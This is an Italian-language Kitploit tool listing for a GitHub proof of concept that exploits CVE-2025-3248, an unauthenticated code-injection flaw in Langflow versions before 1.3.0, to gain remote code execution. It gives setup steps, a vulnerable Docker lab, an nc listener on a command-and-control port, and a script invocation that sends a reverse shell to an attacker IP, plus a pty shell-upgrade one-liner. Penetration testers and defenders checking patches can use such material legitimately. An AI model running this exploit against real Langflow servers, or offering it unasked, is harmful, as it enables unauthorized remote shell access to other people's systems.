Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3248 — PoC per ottenere RCE in Langflow versioni <1.3.0 | Kitploit
Strumenti/GitHubGitHub/wand3rlust/cve-2025-3248
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC per ottenere RCE in Langflow versioni <1.3.0

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-3248

Introduzione

Le versioni di Langflow precedenti alla 1.3.0 sono vulnerabili a un'iniezione di codice non autenticata nell'endpoint /api/v1/validate/code tramite la funzione Python exec(). Questo exploit stabilisce una connessione reverse shell abusando di questa vulnerabilità.

Utilizzo

Configurazione

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

App vulnerabile

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

Esecuzione

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

Es.: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

NOTA: Per aggiornare la shell a TTY, esegui il comando qui sotto dopo aver ottenuto la shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Demo

Demo

Riferimenti

  • Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • Exploit originale: https://www.exploit-db.com/exploits/52262
Scarica lo strumento